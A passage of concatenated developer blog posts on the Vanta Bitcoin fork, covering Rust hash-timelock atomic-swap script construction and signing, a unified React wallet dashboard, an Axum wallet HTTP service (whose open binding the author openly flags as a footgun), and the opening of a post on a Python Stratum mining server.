    pub const OP_DROP: u8 = 0x75;
    pub const OP_SHA256: u8 = 0xa8;
    pub const OP_EQUALVERIFY: u8 = 0x88;
    pub const OP_CHECKSIG: u8 = 0xac;
    pub const OP_CHECKLOCKTIMEVERIFY: u8 = 0xb1;
}

fn build_redeem(
    hash: [u8; 32],
    receiver_pubkey: &[u8],
    sender_pubkey: &[u8],
    locktime: u32,
) -> Vec<u8> {
    let mut s = Vec::with_capacity(128);
    s.push(op::OP_IF);
    s.push(op::OP_SHA256);
    s.push(0x20); // push 32 bytes
    s.extend_from_slice(&hash);
    s.push(op::OP_EQUALVERIFY);
    s.push(receiver_pubkey.len() as u8);
    s.extend_from_slice(receiver_pubkey);
    s.push(op::OP_CHECKSIG);
    s.push(op::OP_ELSE);
    let lt = encode_script_number(locktime as i64);
    s.push(lt.len() as u8);
    s.extend_from_slice(&lt);
    s.push(op::OP_CHECKLOCKTIMEVERIFY);
    s.push(op::OP_DROP);
    s.push(sender_pubkey.len() as u8);
    s.extend_from_slice(sender_pubkey);
    s.push(op::OP_CHECKSIG);
    s.push(op::OP_ENDIF);
    s
}

fn encode_script_number(n: i64) -> Vec<u8> {
    if n == 0 {
        return vec![];
    }
    let mut absn = n.unsigned_abs();
    let mut r = Vec::new();
    while absn > 0 {
        r.push((absn & 0xff) as u8);
        absn >>= 8;
    }
    if r.last().unwrap() & 0x80 != 0 {
        r.push(0x00);
    }
    r
}

fn main() {
    let hash = [0xaa; 32];
    let recv = [0x02; 33];
    let send = [0x03; 33];
    let script = build_redeem(hash, &recv, &send, 144);
    println!("redeem script len = {} bytes", script.len());
    println!("first opcode = 0x{:02x} (OP_IF)", script[0]);
    println!("second opcode = 0x{:02x} (OP_SHA256)", script[1]);
    println!("last opcode = 0x{:02x} (OP_ENDIF)", script.last().unwrap());
}`}/>

The output is a fixed-shape script of roughly 110 bytes, varying slightly with the locktime encoding. The P2WSH wrapper is the `OP_0 <32-byte sha256(redeem)>` encoding — a version byte, then a 32-byte push — that makes the output script the network sees a 34-byte commitment to the redeem script's hash. `p2wsh_script()` in `htlc.rs` does the wrap:

```rust
pub fn p2wsh_script(&self) -> Vec<u8> {
    let redeem = self.redeem_script();
    let hash = sha256(&redeem);
    let mut script = Vec::with_capacity(34);
    script.push(op::OP_0);
    script.push(0x20); // push 32 bytes
    script.extend_from_slice(&hash);
    script
}
```

The `assert_eq!(p2wsh.len(), 34)` test in [`htlc.rs:198`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) is the safety net for that: anyone reading the test sees the constant the wire format depends on.

## Why P2WSH and not Taproot

Worth a brief note. Taproot is the cool kid in 2026, and a Schnorr-key-aggregation atomic swap could in principle use a single key-path spend that looks indistinguishable from a normal transfer. But the simplest thing that could work is P2WSH. v1 ships P2WSH. The Taproot key-path version is the v2 conversation, which I expect to come up around the same time the shielded-VANTA-leg work lands.

## The sighash dance

This is the part of HTLC code that's easy to get wrong and impossible to debug when you do. The witness script is sighashed differently in segwit than in legacy, and the spending side has to compute the *exact* same sighash the verifier will check.
The relevant code is in [`swap.rs:215`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs):

```rust
// Sign: BIP143 sighash over the witness program (the redeem script)
let redeem_script = state.contract.redeem_script();
let witness_script = ScriptBuf::from_bytes(redeem_script.clone());
let privkey = PrivateKey::from_wif(privkey_wif).context("invalid WIF private key")?;
let secp = Secp256k1::new();
let mut sighash_cache = SighashCache::new(&spending_tx);
let sighash = sighash_cache
    .p2wsh_signature_hash(0, &witness_script, Amount::from_sat(htlc_value), EcdsaSighashType::All)
    .context("sighash computation failed")?;
let msg = secp256k1::Message::from_digest(sighash.to_byte_array());
let sig = secp.sign_ecdsa(&msg, &privkey.inner);

// DER-encode signature + sighash type byte
let mut sig_bytes = sig.serialize_der().to_vec();
sig_bytes.push(EcdsaSighashType::All as u8);
```

Three things to notice:

**`p2wsh_signature_hash`, not `legacy_signature_hash`.** This is BIP143 — the segwit sighash. It hashes the input value as part of the sighash so a signature that's valid for "spend X satoshis" can never be replayed for "spend Y satoshis." A legacy sighash doesn't include the value, which is why pre-segwit offline signers could be lied to about the amount an input was actually spending.

**`Amount::from_sat(htlc_value)`.** The funding amount has to be exact. Off by one satoshi and the sighash mismatches, the signature is rejected, and the broadcast fails with a generic `mandatory-script-verify-flag-failed` from `bitcoind`. Welcome to the worst error message in cryptocurrency.

**`EcdsaSighashType::All`** — the standard "sign every input and every output." The only time you'd want a different sighash type for an HTLC is if you wanted partial-input flexibility, which atomic swaps don't.
The Rust [`bitcoin` crate](https://docs.rs/bitcoin/0.32) ships `SighashCache`, which precomputes the parts of the sighash that don't change per-input (the input/output digests) so you can sign multiple inputs without redoing the hash. We have one input, so the cache is trivial — but the API is the same and the per-input computation is correct.

## Witness layout: claim vs. refund

The two witnesses look almost identical and they have to be carefully different. Both are stacks; the bottom of the stack is the redeem script, and what's above it controls which branch runs.

Claim witness, from `claim_witness` in [`htlc.rs:97`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs):

```rust
pub fn claim_witness(&self, signature: &[u8], preimage: &[u8; 32]) -> Vec<Vec<u8>> {
    vec![
        signature.to_vec(),
        preimage.to_vec(),
        vec![0x01], // OP_TRUE — take the IF branch
        self.redeem_script(),
    ]
}
```

Four items. Bottom-to-top of stack: redeem script, OP_TRUE, preimage, signature. Once the script reveal is consumed (the last witness item *is* the redeem script — the P2WSH convention), execution begins at OP_IF. The next pop is `0x01` → truthy → take the IF branch. The IF branch consumes the preimage with OP_SHA256, compares against the embedded hash via OP_EQUALVERIFY, and then the receiver pubkey + CHECKSIG consumes the signature.

Refund witness, from `refund_witness` in `htlc.rs:107`:

```rust
pub fn refund_witness(&self, signature: &[u8]) -> Vec<Vec<u8>> {
    vec![
        signature.to_vec(),
        vec![], // empty — take the ELSE branch
        self.redeem_script(),
    ]
}
```

Three items: redeem script, *empty bytes* (which Bitcoin script interprets as OP_FALSE), signature. OP_IF pops the empty bytes → falsy → take ELSE. The ELSE branch checks `<locktime> OP_CHECKLOCKTIMEVERIFY` against the spending transaction's `nLockTime`, drops the locktime, then verifies the sender's signature.

Two failure modes are interesting:

**Claim with the wrong preimage.** OP_SHA256 hashes whatever you push. OP_EQUALVERIFY fails. The script aborts with a verification error.
The transaction is rejected. The HTLC is still spendable.

**Refund before locktime expires.** OP_CHECKLOCKTIMEVERIFY pulls `nLockTime` from the spending transaction. If it's less than the embedded locktime, the script aborts. The Rust code in [`swap.rs:266`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) preflights this check before broadcast:

```rust
let current_height = rpc::get_block_height(&client)?;
if current_height < state.contract.locktime as u64 {
    anyhow::bail!(
        "Locktime not reached: current height {} < locktime {}. Wait {} more blocks.",
        current_height,
        state.contract.locktime,
        state.contract.locktime as u64 - current_height,
    );
}
```

You could just let the broadcast fail. Better UX is to refuse to construct the transaction in the first place.

## Why the preimage reveal is atomic

Worth dwelling on this because it's the part of HTLC theory that students always blink at. If Alice claims Bob's HTLC by revealing `s`, why does that make Bob's claim of Alice's HTLC inevitable?

Because the preimage `s` is now on Chain B's mempool/blockchain in plaintext. Any node, any explorer, any indexer running on Chain B can extract `s` from the witness stack of Alice's claim transaction. Bob's wallet polls Chain B for the spending of his HTLC, finds `s`, and now has the secret needed to spend Alice's HTLC on Chain A.

The "atomic" property is that revealing `s` to Chain B is *necessarily* publishing it. There is no way to construct a P2WSH spend that hides the witness data — the witness stack is part of the transaction, the transaction is part of the block, the block is gossiped to the network. By the time Alice's claim is mined, Bob already knows.

If Alice never claims (refund path), `s` is never revealed. After $t_1$ blocks, Bob refunds his HTLC. After $t_2$ blocks, Alice refunds hers. Both get their original funds back. No third outcome.
The math: the only way the swap settles partially is if Alice claims chain B and then *somehow* prevents Bob from claiming chain A within the window $t_2 - t_1$. The 2x/1x ratio is what makes that window large enough that Bob's ordinary chain-watching software can detect, parse, and broadcast inside it.

## What the wallet doesn't do (yet)

A fully shielded VANTA leg — where the HTLC's *amount* is hidden — is the missing piece. Today, the value of the P2WSH output on the VANTA chain is plaintext, exactly as it is on Bitcoin. From [the price-discovery post](/blog/vanta_private_atomic_swaps/):

> the current swap implementation is fully transparent on both sides

The plan, gestured at in [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md), is to replace the P2WSH output on the VANTA leg with a witness v2 commitment whose amount is hidden behind a Pedersen blinding. The HTLC pubkey path becomes a shielded-pool note; the claim/refund logic becomes a ZK proof of pubkey ownership + preimage knowledge, instead of a script-level CHECKSIG. Same atomic property; different cryptographic primitive.

That work is real, and it's not in the current `vanta-swap`. The `vanta-swap` we have today is the simplest thing that could possibly work, in 350 lines of Rust, with the same script semantics on both chains. The shielded version is a different post.

## What I changed my mind about

The first version of `htlc.rs` used the `bitcoin::ScriptBuf::builder()` API — the abstraction-layer way of constructing a Bitcoin script. It was 30% shorter and 100% less debuggable. When the OP_CHECKLOCKTIMEVERIFY encoding was wrong (script-number encoding has a sign-bit edge case for negative numbers and for 128 that the builder API didn't surface), I had to rewrite half of it as raw byte pushes anyway to instrument the failure.

The version that ships is the boring `Vec<u8>` with explicit opcode pushes. Every byte is visible.
When something doesn't verify, I read the script in a hex dumper and spot the wrong byte. That's a lower abstraction level than I'd ordinarily reach for, but BIP-199 *is* a wire format, and wire formats want to be visible.

The script-number encoding bug was specifically `encode_script_number(128)` returning `[0x80]` (which Bitcoin script interprets as `-0`) instead of `[0x80, 0x00]` (which encodes positive 128). The test in [`htlc.rs:236`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) is the regression catch:

```rust
assert_eq!(encode_script_number(128), vec![0x80u8, 0x00]);
```

I'd estimate I'd have caught that bug six hours faster if I'd been building the script as bytes from the start.

## Further reading

- [`vanta/vanta-swap/src/htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) — script construction + witness builder + tests
- [`vanta/vanta-swap/src/swap.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) — initiate / participate / claim / refund state machine
- [`vanta/vanta-swap/src/main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/main.rs) — CLI surface and the timelock-halving hint
- [BIP-199](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) — the upstream HTLC pattern
- [BIP-143](https://github.com/bitcoin/bips/blob/master/bip-0143.mediawiki) — segwit sighash, the BIP this signing path implements
- [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/) — the policy framing the implementation rides on
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain doing the verification

---

# The unified dashboard: collapsing private and transparent into one wallet view

Canonical: https://blog.skill-issue.dev/blog/vanta_unified_dashboard_wallet_ui/
Description: Two pages — one for private balance, one for transparent — taught users to think in two heads.
The 2026-04-17 commit folded them. The wallet now shows one balance, one feed, with the privacy boundary inside the data, not the URL.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, wallet-ui, react, design, ux, privacy

The 2026-04-17 commit message — `wallet-ui: merge privacy view into unified dashboard + rescan endpoint` — is one of the smallest functional commits in the Vanta repo and one of the most consequential UX decisions. Up to that point the wallet had a `/dashboard` page (transparent UTXOs) and a separate `/privacy` page (shielded notes). Two pages. Two balance numbers. Two transaction feeds. Users — including, embarrassingly, me — would forget which page they were on and wonder why a transaction "didn't arrive" when it had simply landed on the other page.

The fix was to collapse them. This post is about why that decision matters more than it looks, what the new layout does, and the discipline a privacy chain needs to keep when it ships a wallet.

## Why two pages was wrong

The original split came from a literal reading of the architecture. The chain has a transparent layer (the L1 UTXO set) and a privacy layer (the L2 SMT of commitments). The wallet had two stores backing two pages. Easy mental model for a developer.

For a user, this is the wrong frame. A user has *money*, and the money is *in different states*. Transparent and shielded are states the money happens to be in, like "in checking" vs "in savings." A bank doesn't make you flip between two browser tabs for those. The user thinks "what's my balance" and "what came in lately" — not "let me check my transparent feed *and* my shielded feed."

Worse, two pages teaches people that the privacy/transparent boundary is something they have to think about. It is — sometimes. But mostly the wallet should *handle the boundary* and present *the actual account*. The boundary should be visible *inside the data* (each note or UTXO has a privacy badge), not in the URL.
## What the unified dashboard does

The new [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) is the page. The structure is roughly:

1. **One balance**, prominently — labelled "Private Balance" because that's what 99% of the value should be once the chain is mature, with the small print being "X VANTA transparent" if the user has any.
2. **L2 status card** — SMT root, commitment count, nullifier count, last block height. Auto-refreshing every 5 seconds. This is the chain's privacy view, surfaced *as a number on the dashboard*, not hidden in a settings page.
3. **Quick actions** — send, receive, sync.
4. **One activity feed** — interleaving transparent transactions and shielded notes by timestamp. Each row has a privacy badge (`ShieldCheck` for shielded transactions, `EyeOff` for incoming shielded notes, `Hash` for transparent) and the badge is *the* indicator of which state the value is in.

The L2 status card auto-fetches on a `setInterval`:

```tsx
useEffect(() => {
  fetchL2Status()
  const id = setInterval(fetchL2Status, 5000)
  return () => clearInterval(id)
}, [])
```

5 seconds is a deliberate cadence. The chain produces blocks every 60 seconds, so SMT root updates land at most once per block. 5 seconds gives the user a perception of "this is live" without hammering the L2 sidecar's REST endpoint.

## The rescan endpoint

The other piece of the commit is a `/api/sync` endpoint (and the matching `sync()` action in the Zustand store) that triggers a re-scan of L1 + L2 against the wallet's keys. The rescan reads:

- the L1 transparent UTXOs the wallet's addresses control
- the L2 encrypted-note inbox, trial-decrypting against the wallet's secret to find shielded notes addressed to it

Before this endpoint, "my balance is wrong" was an unrecoverable error state — the user would have to restart the wallet. With the rescan endpoint, "my balance is wrong" is a button click.
The button reports `{ newNotes, scannedToIndex, balance, unspentCount }` so the user sees something concrete: *"found 2 new notes."*

This is the kind of feature that's invisible until you don't have it, at which point support tickets stack up. Shipping it alongside the unified dashboard was the right pairing — the dashboard makes the user expect their balance to be live; the rescan endpoint backstops them when it isn't.

## The badge discipline

The activity feed shows transparent and shielded events together. Each row gets a privacy badge:

- `ShieldCheck` (purple) — shielded transaction
- `EyeOff` (purple) — incoming shielded note
- `Hash` — transparent transaction
- `Layers` — L2-only event (commitment landed but not yet associated with a wallet note)

The colour discipline is consistent across the wallet: purple is the privacy-feature colour, used for L2 elements and shielded states. Transparent elements use the default text colour. The viewer doesn't have to read a label to know which is which.

This is small. It also took longer than I expected to settle on. Earlier drafts had transparent transactions in green and shielded in purple, on the theory that "green = good, purple = brand colour." That backfired immediately — green coded as "fine, no need to look closer" and purple as "interesting, look closer," when on Vanta the desired hierarchy is the opposite (privacy is the default, transparent is the exception).

The current discipline: **shielded is the unmarked default; transparent is *marked* by being non-shielded.** A row without a special badge isn't transparent; it's shielded. A row with a transparent badge is the exception. Visual weight matches the expected long-run distribution.

## Why this is hard

Privacy-coin wallets have shipped with two-pane "shielded vs transparent" UX for years, and it's mostly *not* their fault. The frame leaks from the chain when the chain treats shielded as a separate pool.
On Zcash, you literally have shielded addresses (`zs1...`) and transparent addresses (`t1...`) — two different address families — and a wallet has to render that. Vanta dodges that frame because the chain treats commitments and UTXOs as two states of the same value, with a single address family (`vnt1...`) on top. That gives the wallet *room* to present a unified view. The wallet has to *take* the room, which is what the dashboard collapse is doing.

The principle: **the wallet's frame should match the chain's frame, not the wallet's data model.** The data model has commitments and UTXOs and an L2 sidecar and an L1 RPC. The frame the user sees should be "money in, money out, what's it doing." The data model is the wallet's problem.

## What I'd ship next

Three things on the list, in priority order.

1. **Per-note privacy decay indicator.** Coinbase rewards land transparent for one confirmation before decaying to private (the "fast privacy decay" pattern in [`papers/01-executive-summary.md`](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md)). The wallet should show, on each row, *whether* a note is in its decay window. If it is, the user gets a "wait one block before spending" hint. Today the wallet doesn't surface this — a power user can read it from the L2 status, but no normal user will.
2. **"Send" with no privacy choice.** The send flow today asks "transparent or private?" — even though the answer is *almost always* private. Make private the default; offer a "transparent send" advanced option behind a disclosure. Most users will never need to know transparent sends exist.
3. **Address book scoped to the wallet.** Privacy-respecting wallets often skip address books because of the linkability concern. Vanta can do this *in the wallet*, since the wallet is the only thing that knows which addresses the user has interacted with. Address book entries don't leak to the chain. This was the user-facing thing missing the longest.
The dashboard collapse is the foundation; these are the next-step UX wins it enables.

## The architectural lesson

The dashboard refactor is small but it's an example of the larger principle that runs through the whole wallet: **the privacy boundary is in the data, not the URL.** Two URLs implies two domains of knowledge a user has to manage. One URL, with private/transparent as a property of each row, implies *the wallet manages this and presents one cohesive thing.*

I want this principle to extend. The settings page shouldn't have a "privacy" tab. The send flow shouldn't have a "privacy" toggle as a primary control. The receive page shouldn't ask the user to choose between a shielded and a transparent address. Privacy is the default; transparent is the exception; everything else is the wallet's job to handle.

Some of those changes are shipped. Some are on the list. The dashboard collapse was the one that mattered most because it landed first and it set the discipline for everything else.
## Further reading

- [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) — the unified dashboard
- [`wallet-ui/src/pages/privacy.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/privacy.tsx) — the old privacy view (kept for a while as a deep-dive page)
- [`wallet-ui/src/stores/privacy-store.ts`](https://github.com/Dax911/vanta/tree/main/wallet-ui/src/stores) — the Zustand store the dashboard pulls from
- [The vanta wallet HTTP API](/blog/vanta_wallet_axum_api/) — the L1 service the dashboard calls
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the L2 service the dashboard calls
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — where this dashboard ends up living for end users

---

# The vanta wallet HTTP API: an Axum bridge to vantad RPC

Canonical: https://blog.skill-issue.dev/blog/vanta_wallet_axum_api/
Description: Before the Tauri desktop wallet there was an Axum web wallet. It is a five-route Rust service that wraps vantad's JSON-RPC and serves a single static page. Boring on purpose — and the boring is the point.
Published: 2026-04-13T18:46:45.000Z
Tags: vanta, rust, axum, wallet, api, rpc

The first wallet I shipped for Vanta wasn't a desktop app. It was a [Rust/Axum HTTP service](https://github.com/Dax911/vanta/tree/main/wallet) that wraps `vantad`'s JSON-RPC behind a small REST API and serves a single static HTML page. Five routes, one `Cargo.toml`, one `main.rs`, ~250 lines of Rust. Boring on purpose. The boring is the point — when you're bringing up an L1, the wallet has to be a tool you can debug inside of, not a black box.
This post is a read-along of [`wallet/src/main.rs`](https://github.com/Dax911/vanta/blob/main/wallet/src/main.rs), what the route surface buys you, what's coming next as the desktop app picks up the unified-dashboard work, and what the Axum service is *not* (it's not a key holder; it's a thin bridge).

## The dependency tree

The whole [`Cargo.toml`](https://github.com/Dax911/vanta/blob/main/wallet/Cargo.toml) fits in a screenshot:

```toml
[dependencies]
bitcoin = { version = "0.32", features = ["serde", "rand-std"] }
bitcoincore-rpc = "0.19"
axum = { version = "0.7", features = ["macros"] }
tokio = { version = "1", features = ["full"] }
tower-http = { version = "0.6", features = ["cors", "fs"] }
serde = { version = "1", features = ["derive"] }
serde_json = "1"
anyhow = "1"
```

That's it. Axum for routing, `bitcoincore-rpc` for the typed RPC client (which works against `vantad` because the RPC contract is unchanged from Bitcoin Core v27.0), `bitcoin` for address parsing, `tower-http` for CORS and static-file serving. No database, no auth middleware, no template engine, no ORM. The wallet is a pass-through — the only real state is *whatever* `vantad` says. This is the choice I want to be loudest about. The temptation when you're forking Bitcoin is to ship a wallet that re-implements everything `vantad` already does. Don't. The wallet's job is *to make `vantad` legible from a browser.*

## The route surface

Five HTTP endpoints, registered in `main()` with the canonical Axum router:

```rust
let app = Router::new()
    .route("/", get(index))
    .route("/api/info", get(get_info))
    .route("/api/transactions", get(get_transactions))
    .route("/api/blocks", get(get_recent_blocks))
    .route("/api/send", post(send_zer))
    .route("/api/address/new", post(new_address))
    .layer(CorsLayer::permissive())
    .with_state(state);
```

Each route maps to one or two RPCs. 
Walking through them:

**`GET /` — the index.** This serves the static HTML+JS page bundled into the binary at compile time via `include_str!("../static/index.html")`. The page calls the four JSON endpoints below. Compile-time bundling is a one-binary deploy story: copy `vanta-wallet`, run it, the UI is *there*.

**`GET /api/info` — wallet + network status.** Five RPCs in one handler:

```rust
let balance = rpc.get_balance(None, None).unwrap_or_default();
let unconfirmed = rpc.get_balances().map(|b| b.mine.untrusted_pending).unwrap_or_default();
let block_count = rpc.get_block_count().unwrap_or(0);
let info = rpc.get_network_info().ok();
let mining = rpc.get_mining_info().ok();
```

Returns `WalletInfo { balance, unconfirmed_balance, block_count, connections, mining_address, difficulty }`. This is the polled-every-5-seconds heartbeat the index page uses.

**`GET /api/transactions` — last 50.** A direct passthrough to `listtransactions`, with a small Rust struct mapping over the result so the JSON the browser sees is stable across `bitcoincore-rpc` upgrades.

**`GET /api/blocks` — recent 10 blocks.** Walks `(height-10..=height)`, calls `getblockhash` and `getblockinfo` for each, returns a `Vec`. The per-block RPC round-trips make this O(n), but n is 10, so it's fine.

**`POST /api/send` — send VANTA.** Takes `{ address, amount }`, parses the address against the network (so `Z`-legacy and `vnt1`-bech32 both work), constructs an `Amount` from the float, and calls `send_to_address`. Errors are wrapped with `BAD_REQUEST` for parse failures and `INTERNAL_SERVER_ERROR` for RPC failures.

**`POST /api/address/new` — fresh receiving address.** Calls `getnewaddress` with an optional label.

That's the entire surface. There is intentionally no `wallet/create`, no key-import, no PSBT signing. Those operations go through `vanta-cli` directly — the wallet user is implicitly a `vantad` user. This is fine for the testnet phase. 
It is *not* fine for shipping to the public, which is why the desktop app exists.

## The settxfee dance

One detail in the `main()` startup that took me longer than it should have:

```rust
let _ = rpc.call::<bool>("settxfee", &[serde_json::json!(0.0001)]);
```

Bitcoin Core's fee estimator uses historical mempool data to predict the fee per byte. On a fresh chain with low traffic, it has no data. The default behaviour when the estimator can't decide is to error out of the send call — *not* to fall back to a default. You discover this the first time you try to send a tx on a fresh chain and get back "fee estimation failed." The fix is `settxfee` at startup with a sane fallback. `0.0001 VANTA/kB` is roughly nothing in real terms (one ten-thousandth of a unit, when each block pays out 100,000 units), but it's enough to satisfy the estimator's "have a fee" check. The same trick is in `txbot/src/main.rs` for the same reason. Bitcoin Core does ship a `-fallbackfee` config option for exactly this case, but it's disabled by default on mainnet-like chains; for now, a one-line workaround at every RPC client's startup.

## Auth, or the lack thereof

The Axum wallet binds to `0.0.0.0:8085` and runs `CorsLayer::permissive()`. Translation: anyone on the network can hit it. There's no token, no password, no rate limit. This is fine **for what it is** — a single-operator tool you run on a host you control, with the assumption that the only consumer is the static page bundled into the same binary. It is not fine for a multi-tenant deployment. The host firewall is the auth boundary. If you put this on the open internet you've made a mistake. The desktop app fixes this by running the equivalent logic in-process via Tauri IPC — there is *no* HTTP listener, so there's nothing for a browser tab on a malicious site to talk to. Read [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) and [Vanta Desktop](/blog/vanta_desktop_tauri_wallet/) for the longer story on that boundary. 
## What the API doesn't have, and where it goes

The Axum wallet was written *before* the privacy layer was wired in. So it shows transparent UTXOs only. That's why the wallet-ui split exists: there's a [`wallet-ui/`](https://github.com/Dax911/vanta/tree/main/wallet-ui) React app that calls *both* the Axum service and `vanta-node`'s REST API, and renders a unified view that interleaves transparent transactions with shielded notes. The 2026-04-17 commit message that motivated this whole post —

> wallet-ui: merge privacy view into unified dashboard + rescan endpoint

— is what landed when we collapsed the previously-separate `/privacy` page into the `/dashboard` page so users see *one* balance ("private balance") and *one* feed of activity. Behind the scenes the dashboard is calling:

- `GET /api/info` against the Axum wallet for L1 status (block count, connection count)
- `GET /status` against `vanta-node` for the L2 status (commitment count, nullifier count, SMT root)
- `GET /notes` against `vanta-node` for the wallet's shielded note inventory
- `POST /api/sync` (the new rescan endpoint) to trigger a re-scan of L1 + L2 against the wallet's keys

The unified-dashboard logic lives in [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx). The L2 status card is a five-second auto-refresh that pulls SMT root, commitment count, nullifier count, and last block height, and renders it as four monospace numbers under the "L2 Privacy Layer" header. That's the surface a user sees; behind it are two Rust services and a C++ node.

## Why a separate service instead of merging into vanta-node

A reasonable design question: why does `wallet/` exist at all? Why isn't this one of `vanta-node`'s API endpoints? Two reasons. **Bitcoin-RPC stays as the wallet boundary.** The set of operations the L1 wallet does (send, receive, balance) maps 1:1 to Bitcoin Core RPC calls. 
Wrapping those in a small Axum service means the service is *replaceable* by anything that speaks the same five endpoints — a CLI, a different-language wallet, a hardware-wallet integration. That'd be harder if the L1 wallet primitives were tangled into the L2 sidecar's REST API. **`vanta-node` runs without a wallet.** A node operator who wants to index the chain but doesn't have a wallet on the node — say, a cold-storage setup or an indexer service — should be able to run `vanta-node` cleanly without a transparent-wallet listener implicitly bound. Keeping them separate means each service does one job. The desktop app is the unified frontend that talks to both. The web wallet is the developer/debug frontend that talks to the L1 service. In the medium term I expect the web wallet to be deprecated in favour of "you run the desktop app" — but the Axum service is staying for as long as anyone wants a portable HTTP-shaped wallet.

## What I would do differently

Three things.

1. **Bind to 127.0.0.1 by default.** The current `0.0.0.0:8085` is a footgun for someone who runs this in a non-trusted network without thinking about firewalls. Default to localhost; the user can opt in to LAN exposure with a flag.
2. **Drop `bitcoincore-rpc` for hand-rolled `reqwest`.** The crate is fine but I have hit type-mismatch issues every time `vantad` returns a slightly off-vanilla shape (e.g. our extra `value_balance` field on transactions). Going hand-rolled lets the wallet evolve with the chain without the upstream crate's maintainer in the loop.
3. **Type the receive endpoint against bech32.** Right now `getnewaddress` defaults to whatever the node is configured for (legacy `Z` or bech32 `vnt1`). The wallet should pass `bech32` explicitly so the address format the user sees is consistent.

None of these are urgent. The Axum wallet does its job. It's not the wallet I want to ship to a million users. 
It is the wallet I want behind the wallet I ship to a million users — a debug surface for me, when something is wrong with the chain and I want to talk to it from `curl`. ## Further reading - [`wallet/src/main.rs`](https://github.com/Dax911/vanta/blob/main/wallet/src/main.rs) — the entire Axum service, 250 lines - [`wallet/Cargo.toml`](https://github.com/Dax911/vanta/blob/main/wallet/Cargo.toml) — the dependency tree (small on purpose) - [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) — the React dashboard that calls this service - [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — what replaces this for end users - [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — how `vanta-node` complements this service - [Bitcoin Core JSON-RPC docs](https://bitcoincore.org/en/doc/27.0.0/) — the upstream contract the Axum service wraps --- # Stratum v1, the from-scratch Python version Canonical: https://blog.skill-issue.dev/blog/vanta_stratum_python_pool/ Description: Solo mining Vanta requires a Stratum server. Public-pool is fine for normal chains; mandatory privacy pushes the pool toward shielded coinbases, encrypted-note submission, and an L2 retry queue. pool/stratum_server.py does it all in stdlib Python. Published: 2026-04-13T17:34:24.000Z Tags: vanta, mining, stratum, python, bitaxe, privacy I wrote about [mining VANTA with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the hardware, the watts, the difficulty math, why solo mining a privacy fork actually pays off where solo mining Bitcoin in 2026 doesn't. This post is the deeper companion: what the Python Stratum server *does* once you've decided to write one from scratch, and why the privacy chain forced a few changes that wouldn't be required on a vanilla Bitcoin fork. 
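For readers who haven't stared at Stratum v1 before: the whole protocol is newline-delimited JSON-RPC over a long-lived TCP socket. Here is a minimal sketch of that dispatch shape in stdlib Python — the method names (`mining.subscribe`, `mining.authorize`, `mining.submit`) are real Stratum v1, but the extranonce values and handler bodies are illustrative placeholders, not `pool/stratum_server.py`'s actual logic:

```python
# Minimal Stratum v1 dispatch shape: newline-delimited JSON over TCP.
# socketserver.ThreadingTCPServer gives one blocking thread per miner.
import json
import socketserver

def handle_line(line: str) -> dict:
    """Map one Stratum v1 request line to a response dict."""
    req = json.loads(line)
    method, rid = req.get("method"), req.get("id")
    if method == "mining.subscribe":
        # result: [[subscriptions], extranonce1, extranonce2_size]
        return {"id": rid, "result": [[], "deadbeef", 4], "error": None}
    if method == "mining.authorize":
        return {"id": rid, "result": True, "error": None}
    if method == "mining.submit":
        # a real pool rebuilds the header here, checks it against the
        # share/block target, and calls submitblock when it wins
        return {"id": rid, "result": True, "error": None}
    return {"id": rid, "result": None, "error": [20, f"unknown {method}", None]}

class MinerHandler(socketserver.StreamRequestHandler):
    def handle(self):
        for raw in self.rfile:  # one JSON object per line
            resp = handle_line(raw.decode())
            self.wfile.write((json.dumps(resp) + "\n").encode())

def serve(port: int = 3333):
    """Blocking server loop — one thread per connected miner."""
    with socketserver.ThreadingTCPServer(("0.0.0.0", port), MinerHandler) as srv:
        srv.serve_forever()
```

That is genuinely most of the protocol machinery; everything interesting in a real pool lives behind the `mining.submit` branch.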
The whole server is one file: [`pool/stratum_server.py`](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py). No external dependencies — pure stdlib Python. Around 600 lines. Every line earns its place; this isn't an optimised pool, it's a *correct* pool that I can debug from a terminal at 4 AM.

## Why Python at all

A reasonable thing to ask: "you're shipping Rust everywhere else, why is the pool Python?" Three reasons.

1. **Stratum v1 is a 200-line protocol.** It's JSON over a long-lived TCP connection. `socketserver.ThreadingTCPServer` is exactly the right shape: one thread per connected miner, blocking I/O, no async machinery to argue about.
2. **The interesting work is talking to `vantad` over JSON-RPC and to the L2 sidecar over REST.** Both are HTTP-shaped. `http.client` and `urllib.request` are stdlib. Zero dependency surface.
